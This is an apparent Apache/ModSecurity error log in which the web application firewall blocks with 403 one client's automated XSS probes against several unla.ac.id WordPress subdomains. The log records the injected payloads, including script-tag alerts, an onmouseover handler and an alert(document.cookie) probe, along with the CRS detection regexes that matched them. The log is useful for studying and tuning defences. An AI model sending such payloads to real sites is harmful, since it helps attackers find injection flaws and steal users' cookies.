[accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO150sCo-f0AAAoGFdgAAAAE"]
[Tue Aug 29 11:53:38.885014 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150sCo-f0AAAoqbUoAAAAj"]
[Tue Aug 29 11:53:39.077182 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAox7JEAAAAN"]
[Tue Aug 29 11:53:39.079257 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAoqbUsAAAAj"]
[Tue Aug 29 11:53:39.079715 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAot8ScAAAAn"]
[Tue Aug 29 11:53:39.083125 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAoUJc4AAAAB"]
[Tue Aug 29 11:53:39.612986 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAn408sAAAAW"]
[Tue Aug 29 11:53:41.884353 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApJDSIAAAAY"]
[Tue Aug 29 11:53:41.907516 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApIdigAAAAU"]
[Tue Aug 29 11:53:41.907515 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApJDSMAAAAY"]
[Tue Aug 29 11:53:41.937101 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAo3IfsAAAAa"]
[Tue Aug 29 11:53:41.956072 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAfWOZEAAAAL"]
[Tue Aug 29 11:53:42.575535 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAo2m6MAAAAA"]
[Tue Aug 29 11:53:42.656788 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoLfWIAAAAG"]
[Tue Aug 29 11:53:42.662315 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoPuc4AAAAM"]
[Tue Aug 29 11:53:42.671356 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAowNssAAAAH"]
[Tue Aug 29 11:53:42.677095 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAApHRVQAAAAP"]
[Tue Aug 29 11:53:42.684155 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAoz74MAAAAS"]
[Tue Aug 29 11:53:42.684700 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoAk1oAAAAC"]
[Tue Aug 29 11:53:42.777706 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAoPuc8AAAAM"]
[Tue Aug 29 11:53:42.794428 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoz74QAAAAS"]
[Tue Aug 29 11:53:42.823451 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAowNs0AAAAH"]
[Tue Aug 29 11:53:43.548938 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO1518Co-f0AAAoW7TwAAAAJ"]
[Tue Aug 29 11:53:43.549002 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAnHQtwAAAAT"]
[Tue Aug 29 11:53:43.596942 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAApJDSwAAAAY"]
[Tue Aug 29 11:53:43.601233 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAnHQt0AAAAT"]
[Tue Aug 29 11:53:43.718707 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAofm9wAAAAX"]
[Tue Aug 29 11:53:43.719262 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoyG1MAAAAI"]
[Tue Aug 29 11:53:43.719696 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoGFeoAAAAE"]
[Tue Aug 29 11:53:43.734069 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoPudMAAAAM"]
